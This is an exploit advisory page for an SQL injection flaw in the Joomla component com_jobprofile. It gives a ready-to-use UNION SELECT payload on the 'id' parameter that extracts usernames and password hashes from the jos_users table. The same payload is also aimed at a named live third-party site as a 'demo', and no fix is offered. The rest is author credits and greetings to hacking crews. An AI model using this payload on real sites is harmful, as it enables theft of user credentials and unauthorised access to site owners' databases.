Joomla Component Jobprofile (com_jobprofile) SQL Injection Vulnerability

2011-12-26 / 2011-12-27
Credit: kaMtiEz
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-89

[~] Joomla Component Jobprofile (com_jobprofile) SQL Injection Vulnerability [~] Author : kaMtiEz (kamtiez@exploit-id.com) [~] Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id [~] Date : 2 Dec , 2011 [ Software Information ] [+] Vendor : http://www.thakkertech.com/ [+] INFO : http://extensions.joomla.org/extensions/ads-a-affiliates/jobs-a-recruitment/11924 [+] Download : http://www.thakkertech.com/products/joomla-extensions/components/jobprofile-joomla-component-detail.html [+] Version : null / 1.0 maybe :D [+] Price : 25,00 [+] Vulnerability : SQL INJECTION [+] Dork : "think it :D" [+] LOCATION : INDONESIA - [ Vulnerable File ] http://127.0.0.1/[kaMtiEz]/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=[SQL] [ XpL ] http://127.0.0.1/[kaMtiEz]/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users-- [ Demo ] http://www.e-job.com/site/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users-- [ FIX ] dunno :"> [ Thx TO ] [+] INDONESIANCODER EXPLOIT-ID MAGELANGCYBER TEAM MALANGCYBER CREW KILL-9 [+] Tukulesto,arianom,el-farhatz,Jundab,ibl13Z,Ulow,s1do3L,Boebefa,Hmei7,RyanAby,AlbertWired,GonzHack,n4kuLa,t3ll0 [+] f4ckMen,By_aGreSiF,t0r3x,Mboys,Contrex,Gh4mb4S,jos_ali_joe,k4l0ng666,n4sss,r3m1ck,k4mpret0,Dr.Cruzz [+] yur4kh4,xr0b0t,kido,trycyber,n4ck0,Caddy-Dz,pinpinbo,zaenal,gepenk ~ etc etc [ NOTE ] [+] let it be .. [+] be yourself ;) [ QUOTE ] [+] INDONESIANCODER still r0x [+] nothing secure ..

References:

http://www.indonesiancoder.com
http://exploit-id.com
http://magelangcyber.web.id


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top